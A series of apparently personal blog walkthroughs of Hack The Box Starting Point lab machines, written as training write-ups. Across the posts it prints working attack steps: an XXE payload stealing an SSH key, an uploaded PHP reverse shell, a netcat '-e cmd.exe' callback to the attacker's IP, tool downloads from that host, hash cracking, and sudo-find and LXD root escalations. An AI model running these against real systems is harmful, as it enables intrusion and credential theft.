START_TIME: Tue Sep 14 22:51:33 2021
URL_BASE: http://10.10.10.48/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt
OPTION: Not Stopping on warning messages
 — — — — — — — — -
GENERATED WORDS: 20458
— — Scanning URL: http://10.10.10.48/ — — 
==> DIRECTORY: http://10.10.10.48/_uploaded/ 
==> DIRECTORY: http://10.10.10.48/login/ 
+ http://10.10.10.48/server-status (CODE:403|SIZE:276) 
==> DIRECTORY: http://10.10.10.48/static/ 
— — Entering directory: http://10.10.10.48/_uploaded/ — — 
(!) WARNING: Directory IS LISTABLE. No need to scan it. 
 (Use mode ‘-w’ if you want to scan it anyway)
— — Entering directory: http://10.10.10.48/login/ — — 
(!) WARNING: Directory IS LISTABLE. No need to scan it. 
 (Use mode ‘-w’ if you want to scan it anyway)
- — Entering directory: http://10.10.10.48/static/ — — 
(!) WARNING: Directory IS LISTABLE. No need to scan it. 
 (Use mode ‘-w’ if you want to scan it anyway)
==> DIRECTORY: http://10.10.10.48/static/fonts/ 
==> DIRECTORY: http://10.10.10.48/static/images/ 

Interesting, it looks like the server is configured to allow directory listings. This is significant security oversight. This allows us to browse the directories and determine the file structure which could assist with a hack. This setting can easily be changed in the server configuration but for now let’s leverage that weakness and snoop around.

Hack The Box Base directory listing /login
Base directory listing /login
Hack The Box Base directory listing /static
Base directory listing /static

There are some interesting directories and files on the server, one of which is named login.php.swp and contains the following PHP code:

<?php
session_start();
if (!empty($_POST[‘username’]) && !empty($_POST[‘password’])) {
require(‘config.php’);
if (strcmp($username , $_POST[‘username’]) == 0) {
if (strcmp($password, $_POST[‘password’]) == 0) {
$_SESSION[‘user_id’] = 1;
header(“Location: upload.php”)
} else {
print(“<script>alert(‘Wrong Username or Password’)</script>”);
}} else {
print(“<script>alert(‘Wrong Username or Password’)</script>”);
}

Foothold Hack

It appears as if the username and passwords are being put in to a short array and checked with strcmp. By intercepting and changing the request in Burp we can hack the syntax with an array of our own, and can cause the application to misbehave and hopefully bypass authentication. First, we will need to navigate to the site and submit a login request. We will then need to ensure the browser is configured to send the requests to Burp and that Burp intercept is on.

Hack The Box Base web application login
Base web application login

Second, As soon as Burp has intercepted the request we need to modify it slightly to add our own empty arrays. These arrays need to be added at the end of username and password before the input is received. You can see from the screenshot below that I have added an open and close square bracket to add the array.

The Box Base burp intercept
Burp intercept array manipulation

Finally, we forward the request, and the subsequent set-cookie request with Burp and wait for the web application to respond. The page we are redirected to is an upload page. We know from our dirb results that there is an _uploaded directory. If we assume that is where the file upload puts files then we should be able to upload a reverse shell and hack it from there.

The Box Base upload page
Base upload page

I used the pentestermonkey’s PHP Reverse Shell and uploaded it to the application. I started my netcat listener and then curled the URL to trigger the PHP reverse shell.

[10.10.14.57]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Base/Scripts]
└──╼ [★]$ sudo curl http://10.10.10.48/_uploaded/shell.php

As expected. The shell worked and I was given acces to the box. Before we do anything else, we need to upgrade our shell so let’s run that Python 1 liner.

$ python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
[email protected]:/$

Now that that’s sorted, let’s check out the rest of the website files. When websites connect to databases, they require a database configuration file. Database configuration files contain passwords that could be used to gain access to sensitive information. There are other files like htaccess and htpasswd that could contain sensitive information too so it’s always a good idea to check them.

[email protected]:/$ cat /var/www/html/login/config.php
cat /var/www/html/login/config.php
<?php
$username = “admin”;
$password = “thisisagoodpassword”;

*Smug grin intensifies* The config.php file contains a password. We know this is the password that is required to login to the application, but we don’t know whether it has been reused on the system anywhere. With that in mind, let’s check the home directory and see what users are on the system.

[email protected]:/$ ls /home
john
[email protected]:/$ ls /home/john
user.txt

Privilege Escalation Hack

Sorry John but it looks like you are going to be our victim today. I’m sure you’re lovely guy but if you have reused your password then you deserved to be pwned! (joking, or am I?). Now that we have a username and password, Lets try and switch user to john.

[email protected]:/$ su john
su john
Password: thisisagoodpassword
[email protected]:/$

I believed in you john and you let me down. While we’re here lets grab the user flag from johns home directory.

[email protected]:/$ cat /home/john/user.txt
cat /home/john/user.txt
0011000100110011<haXez>0011001100110111

With that out the way, lets see how we can elevate our provides and grab the root flag. The first thing we need to know is what john can run, besides his security posture in to the ground.

[email protected]:/$ id
uid=1000(john) gid=1000(john) groups=1000(john)[email protected]:/$ sudo -l
[sudo] password for john: thisisagoodpassword
Matching Defaults entries for john on base:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on base:
(root : root) /usr/bin/find

It appears john has permission to run the find command as root. Shame he couldn’t FIND a better password. Moving forward we should check whether find has any methods of escape, like the one we performed on Guard with the man command. In order to this, I checked the website GTFOBins and it says the following command can be used to escape a restricted shell. Hopefully that means it will drop us in to a root shell.

[email protected]:/$ sudo find . -exec /bin/sh \; -quit
# whoami
root

Now all that’s left to do is grab the root flag and we’re done with starting point.

# cat /root/root.txt
0011000100110011<haXez>0011001100110111
Hack The Box Base has been Pwned!

Check out some of my other posts including ArchetypeOopsie, VaccineShieldPathfinderIncluded and Markup.

Guard has been Pwned!

haxez is back, back again, hacking machines, tell a friend. That’s right, back again with another writeup of a Hack The Box Machine. This time we are looking at Guard, please check out my other posts on hack ArchetypeOopsie, VaccineShieldPathfinder, Included and Markup if you haven’t already done so.

Reconnaissance

Hacking this machine was incredibly fun and it didn’t take very long. Lets get straight in to it. First thing I always like to check is whether the box responds to ping requests. This helps to determine whether the machine is online or not.

└──╼ [★]$ sudo ping 10.10.10.50 | tee -a ping.10.10.10.50.txt
[sudo] password for joe:
PING 10.10.10.50 (10.10.10.50) 56(84) bytes of data.
64 bytes from 10.10.10.50: icmp_seq=1 ttl=63 time=37.1 ms
64 bytes from 10.10.10.50: icmp_seq=2 ttl=63 time=21.8 ms
64 bytes from 10.10.10.50: icmp_seq=3 ttl=63 time=21.9 ms
64 bytes from 10.10.10.50: icmp_seq=4 ttl=63 time=22.4 ms

You may notice that I tend to pipe a lot of my commands to tee -a filename.txt. This is a habbit I got in to after a few exams. I also copy the output in to a seperate text file called notes. I tend to write the walkthroughs as I hack and it doesn’t hurt to have more than one copy of something.

We know the box is responding to pings so let’s see what services are actually listening on the box. We can do this by running an nmap scan.

└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.10.10.50 | tee -a nmap.10.10.10.50.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021–09–13 17:06 BST
Nmap scan report for 10.10.10.50
Host is up (0.023s latency).
Not shown: 65535 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:64:23:e0:a7:ec:1d:3b:f0:63:72:a7:d7:05:57:71 (RSA)
| 256 b3:86:5d:3d:c9:d1:70:ea:d6:3d:36:a6:c5:f2:be:5d (ECDSA)
|_ 256 c0:5b:13:0f:d6:e6:d1:71:2d:55:e2:4a:e2:27:0e:c2 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Foothold Hack

The only thing listening on the box appears to be SSH. We could try and bruteforce it with Hydra but I don’t think that’s the intended approach. Since SSH is the only active service I’m going to assume that we should have the credentials already from a previous box. The machine Markup had an XXE vulnerability that allowed us to recover an SSH private key for the user daniel. Lets see if that works.

└──╼ [★]$ ssh -i daniel.key [email protected]
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0–88-generic x86_64)
Last login: Mon Sep 13 15:38:53 2021 from 10.10.14.31
[email protected]:~$

Lovely jubbly the key from the last box worked a treat. We are now on the box but no matter what I tried I couldn’t cat the user.txt file. Something funny was going on. I initially tried to get a shell through Vim as I have used that technique before turns out man was our man! By using the man command we can then “escape” to a shell by typing !bash.

Hack man pages to shell
Hack man pages to shell

And now we can capture the user flag.

[email protected]:~$ cat user.txt
209**********************081

So what’s next? there is a whole lot of file system to look through and not a lot of commands at our disposal. I tried to grab linPEAS from a self hosted Python server but anything I tried to do to download it failed.

[email protected]:~$ curl http://10.10.14.38/leanpeas.sh
curl: (7) Couldn’t connect to server
[email protected]:~$ ping 10.10.14.38
ping: socket: Permission denied
[email protected]:~$ http://10.10.14.38/leanpeas.sh
bash: http://10.10.14.38/leanpeas.sh: No such file or directory
[email protected]:~$ wget http://10.10.14.38/leanpeas.sh
 — 2021–09–13 16:48:20 —  http://10.10.14.38/leanpeas.sh
Connecting to 10.10.14.38:80… failed: Permission denied.
Retrying.

Further Enumeration

Right, it looks like we don’t have permissions to access the socket at all. Not good. Well I guess it’s time for some SSH magic. You can pipe commands through SSH which should allow me to run linPEAS on the remote host from a script on my local system.

─[eu-vip-22]─[10.10.14.38]─[[email protected]]─[~]
└──╼ [★]$ sudo ssh -i daniel.key [email protected] ‘bash -s’ < /Path/To/linpeas.sh

Honestly, nothing quite beats the feeling you get when you do something hacky and it works. Now linPEAS was running on the remote host it was time to go through the output. I noticed some interesting things.

[+] Looking for ssl/ssh files
/home/picasso/.ssh/authorized_keys /usr/lib/initramfs-tools/etc/dhcp/dhclient-enter-hooks.d/config
PermitRootLogin yes
PubkeyAuthentication yes
PasswordAuthentication yes

Firstly, root could login with a password rather than requiring a public and private key pair. I’m not sure if this is going to make things harder or easier at this point but it’s good to take note of it.

[+] Looking for specific hashes inside files — less false positives (limit 70)
/var/backups/shadow:$6$2EEJjgy86KrZ.cbl$oCf1MzIsN7N9KziBNo7uYrHLueZLM7wySrsFYxlNtO5NVhfVsyWCSKiIURNUxOOwC0tm1kyQsiv93imCwLM0k1

It looks like linPEAS was able to grab a hash from a backup shadow file. This has got to be the way we get on to the box as root. lets check out the backup file.

[email protected]:~$ cat /var/backups/shadow
root:$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:18334:0:99999:7:::
daemon:*:18113:0:99999:7:::
---SNIP---
pollinate:*:18113:0:99999:7:::
sshd:*:18326:0:99999:7:::
daniel:$6$2EEJjgy86KrZ.cbl$oCf1MzIsN7N9KziBNo7uYrHLueZLM7wySrsFYxlNtO5NVhfVsyWCSKiIURNUxOOwC0tm1kyQsiv93imCwLM0k1:18326:0:99999:7:::

Privilege Escalation Hack


I’ve snipped out the stuff we don’t need and you can see that the backup file contains the hashes for both root and daniel. Ok let’s grab a copy of it and crack it offline. It should be noted that I also noticed I could cat the /etc/passwd file. With that in mind I grabbed a copy of that too as I was going to use unshadow and attempt to crack it with JohnTheRipper.

└──╼ [★]$ sudo unshadow passwd.txt shadow.txt > passwords.txt

Unfortunately, John didn’t like the file and was unable to crack them so I switched to hashcat with the rockyou wordlist.

└──╼ [★]$ sudo hashcat -m 1800 — force root.hash /usr/share/wordlists/rockyou.txt$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:password#1

Session……….: hashcat
Status………..: Cracked
Hash.Name……..: sha512crypt $6$, SHA512 (Unix)
Hash.Target……: $6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbv…82hY31
Time.Started…..: Mon Sep 13 17:57:10 2021, (1 min, 3 secs)
Time.Estimated…: Mon Sep 13 17:58:13 2021, (0 secs)
Guess.Base…….: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.#1………: 1751 H/s (6.91ms) @ Accel:32 Loops:512 Thr:1 Vec:4
Recovered……..: 1/1 (100.00%) Digests
Progress………: 110336/14344386 (0.77%)
Rejected………: 0/110336 (0.00%)
Restore.Point….: 110208/14344386 (0.77%)
Restore.Sub.#1…: Salt:0 Amplifier:0–1 Iteration:4608–5000
Candidates.#1….: pooh-bear -> pashaungu

The password turned out to be “password#1”. I honestly think we could have brute forced that quite quickly but alas, we were then able to login to the machine as root and capture the root flag.

└──╼ [★]$ ssh [email protected]
[email protected]’s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0–88-generic x86_64)
Last login: Mon Sep 13 15:50:13 2021 from 10.10.14.31
[email protected]:~# cat root.txt
386*******************f681

Markup has been Pwned!

And we’re hack to hack the starter track. By that I mean it’s time to hack another machine from the Starting Point of Hack The Box. I have been going through the Starting Point machines one by one and so far we have been able to hack ArchetypeOopsie, VaccineShieldPathfinder and Included. Now it’s time to move on to Markup!

This is a great box which took me longer than it should have due to my own mistakes. Oh well, it was great fun and I felt silly after I realised what I was doing wrong.

Reconnaissance

So first we ping.

└──╼ [★]$ sudo ping 10.10.10.49 | tee -a ping.10.10.10.49.txt
[sudo] password for joe:
PING 10.10.10.49 (10.10.10.49) 56(84) bytes of data.
64 bytes from 10.10.10.49: icmp_seq=1 ttl=127 time=240 ms

“IT IS ALIVVEE” so lets go ahead and nmap this sucker.


└──╼ [★]$ sudo nmap -sC -sV -p0- -T4 10.10.10.49
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA)
80/tcp open http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
| http-cookie-flags:

I’ve snipped out the parts we don’t need to see. So we have a web server and Secure Shell running. This is a Windows box right? okie dokie lets take a look at the website.

This is a screenshot of the website we are trying to hack.
Markup Website Login

Ok so not a lot going on. I had a quick poke at it with Nikto and dirb but I didn’t find anything that interesting. Lets try the credentials we recovered from the previous box Pathfinder.

The is a screen shot of the website we are trying to hack with valid credentials.
Markup Website Login

Ok great, those seem to have worked. The website has some basic functionality that allows you to place orders. If we capture the request and look at it with Burp we can see that it’s using XML. Furthermore, we can perform an XML injection (XXE External Entity Injection) attack to receive the contents of the win.ini file.

<?xml version=”1.0" encoding=”UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM “file:///c:/windows/win.ini”> ]> <order> <quantity> 1337 </quantity> <item> &xxe; </item> <address> haktheplanet </address> </order>
This is a screen shot of burp repeater showing how to perform a XML injection Hack
Markup XXE Attack 1

Foothold Hack

Ok so we know we can grab files through the XXE attack, whats next? Wasn’t there and SSH port open when we performed the nmap scan? Ok lets find out where Windows stores it’s SSH keys. So by pointing our payload at the .ssh/id_rsa file we should be able to recover the private key.

<?xml version=”1.0" encoding=”UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM 'file:///C:/Users/Daniel/.ssh/id_rsa'> ]> <order> <quantity> 1337 </quantity> <item> &xxe; </item> <address> haktheplanet </address> </order>
This is a gif of XML Hack being performed.
XXE to get RSA

Ok so I grabbed the key and saved it in a file called daniel.key. Make sure to place this in a directory that you own and make sure to change the file permissions to 600. You can do that using chmod 600 file.ext. So next we try to SSH to the server with Daniels key.

This is a gif of trying to ssh to the machine we want to Hack
SSH to Markup

Woop, we have access to the box, let’s see if we can grab the user.txt from Daniel’s desktop.

└──╼ [★]$ sudo ssh -i daniel.key [email protected]
Microsoft Windows [Version 10.0.17763.107]
© 2018 Microsoft Corporation. All rights [email protected] C:\Users\daniel>whoami
markup\[email protected] C:\Users\daniel>type C:\Users\Daniel\Desktop\user.txt
032dXXXXXXXXXXXXXXXXX8ef7

We are on the box and have successfully captured the user flag, we need to find a way to escalate our privileges to administrator to capture that all elusive root.txt flag. I downloaded winPEAS and hosted it using the python http module. Once the file was downloaded to the target machine I ran it to see if there were any interesting files.

This is a picture of a directory listing containing winPEASE which we will use to find a way to Hack the machine.
winPEAS
[email protected] C:\Users\daniel\Documents>powershell -Command (New-Object Net.WebClient).DownloadFile(‘http://10.10.14.38/winPEASany.exe', ‘win.exe’)
This is a gif of winPEAS running on the machine we want to Hack

Ok so after a bit of digging around I found a couple of things that I thought would be useful. The first one was a password, it didn’t seem to work for the administrator though but yoink, will keep that for later.

This is a screenshot of some credentials that winPEAS found on the machine we want to Hack

The next thing winPEAS found was an interesting directory and file that all users appeared to have access to.

This is a screenshot of an interesting file path on the server we want to Hack

Privilege Escalation Hack

This isn’t a typical directory or file you find on a Windows system so it was worth investigating. I ran the icacls command on the file to see what permissions were assigned to it.

PS C:\Users\daniel\Documents> icacls C:\Log-Management\job.bat
C:\Log-Management\job.bat BUILTIN\Users:(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files

So it looks like built in users have full control over the file, that includes daniel. Ok so lets see what the file is actually doing. Using the type command it was possible to read the contents of the file.

[email protected] C:\Users\daniel\Documents>type C:\Log-Management\job.bat 
@echo off 
FOR /F “tokens=1,2*” %%V IN (‘bcdedit’) DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F “tokens=*” %%G in (‘wevtutil.exe el’) DO (call :do_clear “%%G”)
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
:theEnd
exit

So the script appears be an automated script to clear the logs but it requires being an admin to run it. So I had a look at a walkthrough at this point and noticed that others had said the script was running as a scheduled task and that whatever command you echo in to the file would be executed the next time it ran. I had a look at the scheduled tasks and couldn’t find it. I ran schtasks and there was nothing in there relating to job.bat. If you know how this was initially found then please let me know.

So with that in mind I set about dropping a copy of netcat on the box using the same method we used to deliver winPEAS.

Invoke-WebRequest http://10.10.14.38/nc64.exe -OutFile nc64.exe

Then once the file was on the box, I echoed a command in to the job.bat file to tell it to execute nc64.exe or nc.exe (whichever you want to use) and connect back to my machine.

So this is where I messed up for the longest time. It was a really really silly mistake too. In order to make my life a bit easier, I upgraded from a Command Prompt session to a PowerShell session. Then whenever I ran the following command:

echo C:\Users\Daniel\nc64.exe -e cmd.exe 10.10.14.38 1234 > C:\Log-Management\job.bat

It would error and tell me that ‘e’ was too ambiguous, who knew the letter e could be so open to interpretation. Well anyway, I spent about an hour enclosing it with quotation marks and all the other stuff you do to try and echo a string in to the file. I even went as far as to encode it with base64. The string was being echoed in to the file but the shell wasn’t coming back to my local machine. To make matters worse, the file was being overwritten every time it ran so I felt like there was a problem with the machine.

Well there wasn’t a problem with the machine, there was a problem with my brain. I dropped down to Command Prompt from PowerShell, ran the command without any quotation marks, the ‘e’ was accepted and within seconds I had a reverse shell with Administrator privileges, and then I captured the root.txt flag.

PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
f57XXXXXXXXXXXXXXXXX0f8

So if you get to this point on the machine and you’re pulling your hair out wondering why your exploit wont work. Try changing from PowerShell to CMD when echoing the string to the job.bat and see if that works. Lesson learned. One thing I did find interesting though was that I created a payload using MSFVenom and dropped that on the box. I echoed the location in to the script but still didn’t get a shell when it executed. I ran type on the file to confirm that the text had been added. Very odd.

This image shows that the machine we were trying to hack has indeed be pwned!
Markup has been Pwned!

Included has been Pwned!

Ok it’s time to hack another machine from the Hack The Box Starting Point series. We have already managed to hack ArchetypeOopsie, Vaccine, Shield and Pathfinder. Today we are looking at the Included machine. This was a really fun box despite a frustrating ending. This box is fairly simple to start off with provided you notice everything that is going on.

Reconnaissance

So first of all we ping the box to see if it’s up.

└──╼ [★]$ sudo ping 10.10.10.55 | tee -a ping.txt
PING 10.10.10.55 (10.10.10.55) 56(84) bytes of data.
64 bytes from 10.10.10.55: icmp_seq=1 ttl=63 time=21.5 ms

Next we run our nmap scan.

└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.10.10.55 | tee -a nmap.10.10.10.55.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021–09–11 16:30 BST
Nmap scan report for 10.10.10.55
Host is up (0.022s latency).
Not shown: 65535 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn’t have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.10.55/?file=index.php
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Ok so only a webserver is running, or is it? So I went to poke at the website and immediately saw that the website was calling the index.php using a file parameter. Caught my eye because it seemed like quite an obvious naming convention for accessing files. So naturally I pointed it straight at the /etc/passwd file and immediately had the file returned back to me.

This is an image of the titan gears website that we are trying to hack.
Hack The Box Included File Inclusion
This is an image showing local file inclusion hack on the titan gears website.
Hack The Box Included /etc/passwd

Sweet where now? Well as other guides have mentioned, there is an interesting user in the /etc/passwd file. As you can see from the tool ouput below, the user tftp exists at the very bottom of the file with the home directory of /var/lib/tftpboot.

cat /mnt/root/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
mike:x:1000:1000:mike:/home/mike:/bin/bash
tftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin

Interesting, I confirmed that TFTP was open, it listens on UDP rather than TCP which is why our Nmap scan missed it. At this point I would also like to point out that Nessus missed the TFTP service too. It also missed the directory traversal vulnerability which I also felt was odd since I asked it to san for web vulnerabilities. Nikto also missed the directory traversal vulnerability so this is an important lesson that you can’t always rely on tools

This image shows Nessus scan results which doesn't really show that there is anything to hack.
Hack The Box Nessus Output

Foothold Hack

Anyway I’m getting side tracked. I pinched the tried and tested pentestmonkey/php-reverse-shell and configured it for my IP address and port. I then uploaded the file to the machine using tftp.

└──╼ [★]$ tftp 10.10.10.55
tftp> put phpshell.php phpshell.php
Sent 5681 bytes in 0.4 seconds
tftp>

Once that was uploaded to the server I created my netcat listener and then ran curl against the URL to get a shell.

└──╼ [★]$ curl http://10.10.10.55/?file=../../../../../var/lib/tftpboot/phpshell.php

I checked out the history and ran a few other tools but nothing of much interest. There was a user called mike by listing out the /home directory. I guess this is the user we need to escalate to, to proceed further. It looks like mike has the user.txt flag in his home directory to so this confirmed my suspicious. After failing for a while I decided to try and switch user to Mike using the password found on the previous machine Pathfinder. Yeah it worked.

bash-4.4$ ls /home/mike
ls /home/mike
alpine-v3.14-x86_64–20210909_2211.tar.gz user.txt
bash-4.4$ cat /home/mike/user.txt
cat: /home/mike/user.txt: Permission denied
bash-4.4$ su mike
su mike
Password: Sheffield19

With that I was able to capture the user flag.

bash-4.4$ cat /home/mike/user.txt
cat /home/mike/user.txt
a56XXXXXXXXXXXXXXXXXXXXXXX5a1

So what next? Well it was time to perform some more enumeration on the machine. I grabbed a copy of Linpeas and hosted on my machine using Python’s simple http server. I then downloaded the script and ran it. Unfortunately, my VM crashed before I had chance to save the output but it turns out mike is a member of the lxd group.

At this point I checked the official walkthrough and attempted to follow the instructions. However for whatever reason I couldn’t get the lxd-alpine-builder script to work at all. Every time I ran the script, I just kept getting an error message telling me there was an invalid parameter. I tried to strace the script but the information it provided wasn’t much help either.

Privilege Escalation Hack

After a bit of google fu I found this awesome article by hacktricks.xyz that essentially does the same thing but differently. So, I got to following the instructions there and created the image.

sudo su
sudo apt update
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
sudo go get -d -v github.com/lxc/distrobuilder
cd $HOME/go/src/github.com/lxc/distrobuilder
make
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

With the image and the rootfs.squashfs file ready, I started the python server again and downloaded the files from my local machine to the Included machine.

[email protected]:~$ wget http://10.10.14.38/rootfs.squashfs
2021–09–11 18:02:14 —  http://10.10.14.38/rootfs.squashfs
Connecting to 10.10.14.38:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2318336 (2.2M) [application/octet-stream]
Saving to: ‘rootfs.squashfs’
rootfs.squashfs 100%[===================>] 2.21M 3.17MB/s in [email protected]:~$ wget http://10.10.14.38/lxd.tar.xz
2021–09–11 18:03:40 —  http://10.10.14.38/lxd.tar.xz
Connecting to 10.10.14.38:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 884 [application/x-xz]
Saving to: ‘lxd.tar.xz’
lxd.tar.xz 100%[===================>] 884 — .-KB/s in 0.005s

With the files now on the machine, I imported the image, configured it and ran it.

[email protected]:~$ lxc image import lxd.tar.xz rootfs.squashfs — alias alpine
[email protected]:~$ lxc init alpine privesc -c security.privileged=true
lxc init alpine privesc -c security.privileged=true
Creating privesc
[email protected]:~$ lxc list
lxc list
+ — — — — -+ — — — — -+ — — — + — — — + — — — — — — + — — — — — -+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+ — — — — -+ — — — — -+ — — — + — — — + — — — — — — + — — — — — -+
| privesc | STOPPED | | | PERSISTENT | 0 |
+ — — — — -+ — — — — -+ — — — + — — — + — — — — — — + — — — — — [email protected]:~$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
<st-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
[email protected]:~$ lxc start privesc
lxc start privesc
[email protected]:~$ lxc exec privesc /bin/sh
lxc exec privesc /bin/sh

While the shell wasn’t pretty, it did have root access and I was able to capture the final flag.

cd /mnt/root/root
/mnt/root/root # ^[[43;18Rcat root.txt
cat root.txt
c69XXXXXXXXXXXXXXXXbcf
This image shows the included machine that we were trying to hack being pwned!
Hack The Box Included Has Been Pwned!

Pathfinder has been Pwned!

Welcome back to haXez, a place where I hack boxes and write about them. I’m not pretending to be an elite hacker. in fact I hardly know anything. This place is for learning and for me to document my progress. We are currently working our way through the Starting Point on Hack The Box, so far we have managed to hack the following machines: Archetype, Oopsie, Vaccine and Shield. Today we are looking at Pathfinder.

This box was a lot of fun and straight forward thanks to the walkthrough from h4rithd. Yes, I’m using walkthroughs… Honestly though, a lot of the time on Hack The Box, the problem is knowing which questions to ask. If you don’t know about a certain tool or about that specific weakness in a software configuration. Then you could be looking for hours or even days to find a foothold. I’m here to learn about these tools and software configuration weaknesses. Not spend hours researching all the potential ways they could be exploited. Anyway, with that out the way, lets begin.

Reconnaissance

First I spun up the machine and connected to the VPN. Next I pinged the box to see if it was responding and yep, the machine started talking to me.

└──╼ [★]$ ping 10.10.10.30
PING 10.10.10.30 (10.10.10.30) 56(84) bytes of data.
64 bytes from 10.10.10.30: icmp_seq=1 ttl=127 time=21.6 ms

So what do we do next? We nmap of course.

└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.10.10.30 | tee -a nmap.txt
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49717/tcp open msrpc Microsoft Windows RPC
Network Distance: 2 hops
